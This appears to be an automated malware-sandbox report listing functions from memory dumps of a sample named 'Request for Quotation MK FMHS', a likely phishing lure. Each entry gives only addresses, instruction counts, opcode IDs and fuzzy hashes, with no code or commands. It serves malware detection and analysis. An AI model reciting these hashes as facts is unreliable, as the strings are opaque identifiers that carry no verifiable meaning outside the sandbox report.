Opcode ID: 7eb14f77ddc66d89e18e81ca5e5753e455aff51c7f7c2c543285006d43679ab6
Instruction ID: ca38dd3427978d429b67772cffc0d489d735778b55b53c42582919f0ee610f9b
Opcode Fuzzy Hash: 7eb14f77ddc66d89e18e81ca5e5753e455aff51c7f7c2c543285006d43679ab6
Instruction Fuzzy Hash: 74529B75E00219CFCB64EF68ED99A9DBBB2FB48301F1045A9D409A7358EB306E85DF50

Function 01250CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRsq, xrefs: 01250F19

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: LRsq
API String ID: 0-3165563352
Opcode ID: 246ceb6a27622c906de9924a03273d04a8e20cfd97dba91730d443d5e944623a
Instruction ID: 98503a42ffcfc7adcf7e79a60c1a98d5dff767403cfb52055a94b7ab873dec62
Opcode Fuzzy Hash: 246ceb6a27622c906de9924a03273d04a8e20cfd97dba91730d443d5e944623a
Instruction Fuzzy Hash: AD529B75E00219CFCB64EF68ED99A9DBBB2FB48301F1045A9D409A7358EB306E85DF50

Function 0125A62F Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

4'sq, xrefs: 0125AB13

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: 4'sq
API String ID: 0-1075809040
Opcode ID: 10349a566417514b371ac17fdb0f1b948b0998aefa49518c55bced43d6d7305d
Instruction ID: ab90bedc41ae3b2d6c3675024b17c18b15b16fccb6781189cc25a0bfcad135e2
Opcode Fuzzy Hash: 10349a566417514b371ac17fdb0f1b948b0998aefa49518c55bced43d6d7305d
Instruction Fuzzy Hash: CC128E3161010ADFCB55CFA8C5D9AAEBBF2BF88300F158655E9059B3A6D730ED81CB61

Function 0125AEF0 Relevance: 1.3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

Strings

(osq, xrefs: 0125AECD

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq
API String ID: 0-609861455
Opcode ID: cbf6b4b08fa63eef82117d354e88e14865aa3ec936ea2db33def5990fd3fb768
Instruction ID: ab8f0ccabdfc444e8e712613fb3cdaa97c4d0a8811b46bcb0d7b9e2e6e285381
Opcode Fuzzy Hash: cbf6b4b08fa63eef82117d354e88e14865aa3ec936ea2db33def5990fd3fb768
Instruction Fuzzy Hash: 6521C871B102099FCB548F58D896AEEBBF6FF8C310F144129ED1597291DA729C01CB90

Function 01256778 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

(osq, xrefs: 012567A3

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID: (osq
API String ID: 0-609861455
Opcode ID: bcbe13d9d73abf7cbaac61570d08b4d5dc06cad75517177e868c82fe21c0c150
Instruction ID: 3d2551cc0db795406d5bdb9abaaf5b7d2d761bb4d7f7a1283606a407c7b2241d
Opcode Fuzzy Hash: bcbe13d9d73abf7cbaac61570d08b4d5dc06cad75517177e868c82fe21c0c150
Instruction Fuzzy Hash: 061121B1B003124FC758AA7C9CA0A6F7FEAAFC5260304457ADA01CB396FE30CC0587A1

Function 0125E007 Relevance: .7, Instructions: 653COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9852bec3768ccd30547b164e5566ab2401c97669f7e2ba9ddf9ada2151205122
Instruction ID: ac8434d3fe679a95ba30787436f3d50ef6012afa204f91c55ea0904220f40a4f
Opcode Fuzzy Hash: 9852bec3768ccd30547b164e5566ab2401c97669f7e2ba9ddf9ada2151205122
Instruction Fuzzy Hash: 631298750292578FA3647B30F6BD12BBB65FB1F3277066C84E02B8545DEB3104488B36

Function 0125E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebad84db26ca3ee358b9b54ea5e50dc21a7e5b38c7c21557ece0d060f3aafb86
Instruction ID: 34fa95781f99cf09f03391f1c655756dc03cc20b2b5568a7ea20c8dd20409f7b
Opcode Fuzzy Hash: ebad84db26ca3ee358b9b54ea5e50dc21a7e5b38c7c21557ece0d060f3aafb86
Instruction Fuzzy Hash: 511288750292578FA3647B30F6BD12BBB65FB1F327706AC84E12B8445CEB3104888B76

Function 05979841 Relevance: .2, Instructions: 234COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77886533dba592f80f276beab47cfb384461e898a22ccf18c8ff1272a6a66b6f
Instruction ID: 3786b738545cda4e6e64ee8fcad89fbb3dd629905f4c254ea16acaa211a3d279
Opcode Fuzzy Hash: 77886533dba592f80f276beab47cfb384461e898a22ccf18c8ff1272a6a66b6f
Instruction Fuzzy Hash: 7AC1AE74E002298FDB64DF68C995BE9BBB2BB88300F1081EAD54DA7394DB705E85CF51

Function 05979850 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a9774908b806b1d9e551e44a2189ed7445930c939043d8e9dcfa163cc8d7ce4
Instruction ID: da2f0121c2f831c735f9ea8a9038bea24d1837d89ca38ea81edf2f636f743819
Opcode Fuzzy Hash: 7a9774908b806b1d9e551e44a2189ed7445930c939043d8e9dcfa163cc8d7ce4
Instruction Fuzzy Hash: 7DB1AD74E002298FDB64DF68C955BD9BBB2BB88300F1081EAD54DA7390DB705E85CF51

Function 012580D8 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 699b2ad329a1ce5c3b458bd1c56ec345c7285883afd155c4c6a6892aa4b49305
Instruction ID: d75c9081970a23dd355f45121e395c221ee6cdaa0d10669787ef2c957b39c410
Opcode Fuzzy Hash: 699b2ad329a1ce5c3b458bd1c56ec345c7285883afd155c4c6a6892aa4b49305
Instruction Fuzzy Hash: B27159347206468FDB65DF6EC888A6A7FE5AF49281B1540A9EE02CB371DBB0DC41CB50

Function 059794F0 Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 94ff20fb6a67744b146b8582e164e20d9872b2840af9eb03a0e7b6a326fbfa76
Instruction ID: ffcd52bccd5f72802634d337409410dbf8e7d4bf33b5f9a6dbe97be1476f6aed
Opcode Fuzzy Hash: 94ff20fb6a67744b146b8582e164e20d9872b2840af9eb03a0e7b6a326fbfa76
Instruction Fuzzy Hash: 3A61B475E012099FDB08DFE9D950AAEBBF2FF88310F14D569E808BB354DA319842CB54

Function 0125F71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f765aa875f1b32abc539b07fe15c3e91accea071514c07d54f350e5e68facf56
Instruction ID: 7725105b50ce6f16920847b0daf76139c607b68e607927a8f1f2adebdb3d17bc
Opcode Fuzzy Hash: f765aa875f1b32abc539b07fe15c3e91accea071514c07d54f350e5e68facf56
Instruction Fuzzy Hash: 176102B4D10219CFDB18DFA5D998AEEBBB2FF88300F208529D909AB354DB755985CF40

Function 0125D548 Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16f5f08f38bbe9e0baf6e1c11973b1ba24c7134e483e90079d69194f3bf1643d
Instruction ID: bbf29401b88c5d20d95287477458f9a25dd8373f19a954cca0a4a8e299f6f74e
Opcode Fuzzy Hash: 16f5f08f38bbe9e0baf6e1c11973b1ba24c7134e483e90079d69194f3bf1643d
Instruction Fuzzy Hash: 9B5183B4E11208DFDB58DFA9D5949DDBBF2BF89300F208169E819AB364DB319901CF50

Function 05979CD7 Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45c4185965f304b871ace73c57129fdd4de90db6ab8995959726dd1cf0edf8a7
Instruction ID: 7488b50775077a986716927520797c68bd043a630942ff33918ffc0a93d100e4
Opcode Fuzzy Hash: 45c4185965f304b871ace73c57129fdd4de90db6ab8995959726dd1cf0edf8a7
Instruction Fuzzy Hash: 6651A374E002199FCB44DFE9D595AEEBBF2FF88300F20852AD519AB354D7345A45CB90

Function 012541A0 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cebef68877e204644b4bfec21ab380900d77b4bda189f27fc3d320604d92bf1
Instruction ID: 3bd5e16550fa8a6edd0e5034e14a7be5b7bd3f1c1396c6fe3c20c1b288416a45
Opcode Fuzzy Hash: 1cebef68877e204644b4bfec21ab380900d77b4bda189f27fc3d320604d92bf1
Instruction Fuzzy Hash: B551B375E11208DFCB48DFB9D58489DBBF2FF89301B209469E815AB364DB31A942CF50

Function 0125A303 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8c4a9acf867b71a20a84f2aa425d74e46986e7315c141ae657e103845c4e43
Instruction ID: 361daf2e59a9b0cecfd6f2e43844bedc471762199191cb36cf2f6e43d8df693e
Opcode Fuzzy Hash: cd8c4a9acf867b71a20a84f2aa425d74e46986e7315c141ae657e103845c4e43
Instruction Fuzzy Hash: 4041C331A14249DFCF52CFA8C889A9EBFB2FF49314F048655EE45AB292D374D914CB60

Function 05978A59 Relevance: .1, Instructions: 121COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbb4cb3933fe8f263b11c35494564bcf943a67aef0d0dd4cd98a8222ad81e405
Instruction ID: 0563f5c9825e6195cf58756e0dd069b7b56be793d80e90473aaa5ac4b3b0fe64
Opcode Fuzzy Hash: fbb4cb3933fe8f263b11c35494564bcf943a67aef0d0dd4cd98a8222ad81e405
Instruction Fuzzy Hash: 6B411271E1021D9BDB14DFA5C895AEEBBB5FF88710F28852AE405B7340DB70A946CBD0

Function 01259C30 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ac726b5e896b77157b849cf5cc57ad95e0a8acb4dc547b1618d251549dad9a2
Instruction ID: b1e7801b53e8ec10a96c742f26e1b925dbe05f6303562cd92841ab1a6519f379
Opcode Fuzzy Hash: 4ac726b5e896b77157b849cf5cc57ad95e0a8acb4dc547b1618d251549dad9a2
Instruction Fuzzy Hash: 0341A070721245CFDF41DF6CC884B6A7BE6EB88309F448466EA08CB256D771DD81CB61

Function 01255658 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d96e4585081b563ece801d0f57c55fac14c81276769ae9317fce1b627fc34d2
Instruction ID: 63807ad8923940df5ea5e63bfc1a46dbbb732485adcfda6f3536aa93fdbcddaa
Opcode Fuzzy Hash: 7d96e4585081b563ece801d0f57c55fac14c81276769ae9317fce1b627fc34d2
Instruction Fuzzy Hash: D431B43121025ADFCF55AF68E898AAF3BA2FF48311F104018FE158B344DB35D921CBA1

Function 01258370 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f2f667c61a5f43254fef33bb341cfd9a0fe1a517ec2bf29cdfd6e4359bc0911
Instruction ID: 58b91bb148737fe9fa723b5f1fdb732db80f0994dc39614525a090e9b3f05a2a
Opcode Fuzzy Hash: 8f2f667c61a5f43254fef33bb341cfd9a0fe1a517ec2bf29cdfd6e4359bc0911
Instruction Fuzzy Hash: 7C2106303242528BDB66173A94D9A3F2EA7EFC4709704403EDE02CB2AADEB5CC02D341

Function 01258380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a680666d53583ce949ecdcf9d6912b0f2b5d8bd389e99501a76742773aca8cc
Instruction ID: 6debd78513856e91830d0266e66e2ea7eb04d1817eee5688f3bb37bafd8aa2de
Opcode Fuzzy Hash: 7a680666d53583ce949ecdcf9d6912b0f2b5d8bd389e99501a76742773aca8cc
Instruction Fuzzy Hash: 2821A1303242124BDB65562A94D9A3F6A97EFC4759F14803DDE02CB7AAEEB5CC429381

Function 01252790 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7de99a93b381ba6fde547275c85f3d5bb841ac6cbf215915c456e86216395169
Instruction ID: a6e84638474bee8a03a6f7318696303804caac332471ecbee0dc0d837878be07
Opcode Fuzzy Hash: 7de99a93b381ba6fde547275c85f3d5bb841ac6cbf215915c456e86216395169
Instruction Fuzzy Hash: F1315674D09249CFCB05DFB8D4855EEBFB1FB4A300F00426AD845A7254EB310985CB62

Function 012528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21624a704a0501d7e7676d05c812d2f9608fb4aef9ad82848e7450b637cdf1d
Instruction ID: b2cee9b5a725af465dd92dd95777884efe21526a74902816ed77f4a0c4ab9218
Opcode Fuzzy Hash: a21624a704a0501d7e7676d05c812d2f9608fb4aef9ad82848e7450b637cdf1d
Instruction Fuzzy Hash: 9921A776A00106DFCF59DB34C4809AE77B5EB9D360B20C859DD0997384DB30EA42CBD1

Function 01256300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 579d2ca92a13ab1e34a960e4e8d448f4bf8e8bacce5a4ce164762a04aae38e9c
Instruction ID: 3b6744f8bf47874570d4cb0e7f45ef63e0edf673ddd0cebd130832a1b23cd01e
Opcode Fuzzy Hash: 579d2ca92a13ab1e34a960e4e8d448f4bf8e8bacce5a4ce164762a04aae38e9c
Instruction Fuzzy Hash: BC21D5357106129FD729AB29D49892FB7A6FFCAB517544029EE06CB359CF31DC01C780

Function 010FD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4515610178.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_10fd000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0e0714368ef8d620a237e33a92829e6875bbefaba8ee2a185e02eccb9b19f49
Instruction ID: 20698be2eb11fb10d23079f1d922251f6fdf8e6eacd2ccca1bb66977195093db
Opcode Fuzzy Hash: d0e0714368ef8d620a237e33a92829e6875bbefaba8ee2a185e02eccb9b19f49
Instruction Fuzzy Hash: 7B2134B1504204EFCB15CF68C9C1B26BBA5FB84314F24C9ADEA894B642C73AD446CB62

Function 05979EA9 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6cf71eaaac536efe0534b64a3fb3b0dfe8d5e18b3eb5161bc42b30388a458c0
Instruction ID: e144a575a5c4bb1e11d256b4b5f8de292f54dac8edd970987d5ace7af3be5299
Opcode Fuzzy Hash: d6cf71eaaac536efe0534b64a3fb3b0dfe8d5e18b3eb5161bc42b30388a458c0
Instruction Fuzzy Hash: 4421E4B5D012199FCB10CF99D984BDEBBF8FF48320F14815AE819AB251D3749944CFA0

Function 01255649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f3d767fd27ad585a731f752c7081f2eb89143ed21983c2b9113df4239e38b9a
Instruction ID: 2c94e4ac11a17c0c303697ac4f3b96cf27c461f5d4dc79492559e8fd442375dd
Opcode Fuzzy Hash: 0f3d767fd27ad585a731f752c7081f2eb89143ed21983c2b9113df4239e38b9a
Instruction Fuzzy Hash: C621233161424ADFCB15AF28E4986AF3BE1FF89210F104069FD058B348DB38DD51CBA1

Function 01254285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4075e72020f2156689f0f352bcbccc9b630a9cac7c45ed6f5dc73dda0aaf31ef
Instruction ID: 8cb29d1fd12d6b6f402c6858158c31e59395fcc1a6c713dd88a06233413c7605
Opcode Fuzzy Hash: 4075e72020f2156689f0f352bcbccc9b630a9cac7c45ed6f5dc73dda0aaf31ef
Instruction Fuzzy Hash: D731A679E11208DFCB48EFA9E5848ADBBB2FF49305B205469E819AB324D731AD41CF00

Function 05979EB0 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a92c3e4a33fd79b032e69b038aacf445f2a81b39a534081346936277ca57d56b
Instruction ID: e9fce898c2f0f36fa309563ec071e86ea94ea010a68a5ea5957e5a7278b0f486
Opcode Fuzzy Hash: a92c3e4a33fd79b032e69b038aacf445f2a81b39a534081346936277ca57d56b
Instruction Fuzzy Hash: 1421C4B5D012199FCB50CF99D984ADEBBF8FB48320F14815AE819AB251D3749944CBA4

Function 01259761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b08cc6ec39d361eb3d83a7bb5fda31cbd7b94c211c2be9f3dc33eac52e6eaddc
Instruction ID: 2cb2198943360584a20d1cba2c5da2e5d8ee4b7dec999c1bd4e7d47e066fe071
Opcode Fuzzy Hash: b08cc6ec39d361eb3d83a7bb5fda31cbd7b94c211c2be9f3dc33eac52e6eaddc
Instruction Fuzzy Hash: 9D217A70E05249DFDF19CFB5E594AEEBFB6AF49204F248069E904A6394DB30D981CB20

Function 05978C4B Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d47382aaf6afebe044e90110d0abb6f05de473ef71c41af06432635d1c92a61
Instruction ID: 8ccfbee3a5bbbb8a70ee0264857eef1d080ba4479e6a46d53ae60a9047b0b14e
Opcode Fuzzy Hash: 0d47382aaf6afebe044e90110d0abb6f05de473ef71c41af06432635d1c92a61
Instruction Fuzzy Hash: 1911E73A7082541FCF4AAB7C88546AE3FA7EFC9210B554469E50ADB381DE344C0287A6

Function 012562F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abe14bd8ae4b84ea87df7684b66653f1df3554f63f15d3774bcf7d0a101e91bb
Instruction ID: abef0d9afb6512f385a51f01f94c2d80419bdcca10e84e3f7a465e2b14acfc94
Opcode Fuzzy Hash: abe14bd8ae4b84ea87df7684b66653f1df3554f63f15d3774bcf7d0a101e91bb
Instruction Fuzzy Hash: A411E3353146129FD7255B29D49852E7BA2FFC6B513584069E906CB365CF31CC028790

Function 0125F640 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845514143d2f568fa3bd3d73479f11ee71b3002b2b5cca0c76b947cf9d3aeaa5
Instruction ID: fbe79e0b2a25d5ff764df47bd7e659edd59a96cb9dcbcda5493a5b26113d03fa
Opcode Fuzzy Hash: 845514143d2f568fa3bd3d73479f11ee71b3002b2b5cca0c76b947cf9d3aeaa5
Instruction Fuzzy Hash: 5E2138B1D0020ADFDB48EFA9D58069EBFF2FB44300F1095AAD554AB354EB709A459F81

Function 012527F0 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dedfd09d124c575fffedcb46dd02d8b770650ceca6cc3fe8d48ab296f68001e
Instruction ID: a993596c5807da9b9e71774a29e65beac193afc6fc8586be0c70dabe4363017d
Opcode Fuzzy Hash: 7dedfd09d124c575fffedcb46dd02d8b770650ceca6cc3fe8d48ab296f68001e
Instruction Fuzzy Hash: 5521ABB5D0520ACFCF50EFA9D9895EEBBB1AB09310F10426AD805B2214EB315A85CBA1

Function 059787A8 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 317d61dec1db4ff5f7870246428ef94867f1339d34db6663e346f1f76c6019d4
Instruction ID: bcbd1e0fdfad9f65ae78da8bc25f1c18e3bb665296fb0b3e3c2cf3bc470e2db3
Opcode Fuzzy Hash: 317d61dec1db4ff5f7870246428ef94867f1339d34db6663e346f1f76c6019d4
Instruction Fuzzy Hash: DA1114B6800249DFDB10DF99C845BEEBBF5EB48320F14845AE528A7211C379A550DFA5

Function 0125F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4516022475.0000000001250000.00000040.00000800.00020000.00000000.sdmp, Offset: 01250000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1250000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c646d57427a5dcd32caff15a580db44cb63eeec9960d9660a85c5cdf537bb614
Instruction ID: 4ae345233c05d09e903fba3279ec079de3fd1f72c15ce3da7f3922f87676872b
Opcode Fuzzy Hash: c646d57427a5dcd32caff15a580db44cb63eeec9960d9660a85c5cdf537bb614
Instruction Fuzzy Hash: 441137B1E0020ADFDB44EFA9D98069EBBF2FB44300F10D5A9D558AB354EB305A459F81

Function 05978431 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.4528284472.0000000005970000.00000040.00000800.00020000.00000000.sdmp, Offset: 05970000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5970000_Request for Quotation MK FMHS.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d0fcb4a302086b6c28e22ab61e5e3f2e2c1abb60617109966e4a0eafca275d07
Instruction ID: 64f8e60bfc71cd06dbea28f2702ddaf7d26e62f5b8fd3a70944d10a229829a48
Opcode Fuzzy Hash: d0fcb4a302086b6c28e22ab61e5e3f2e2c1abb60617109966e4a0eafca275d07
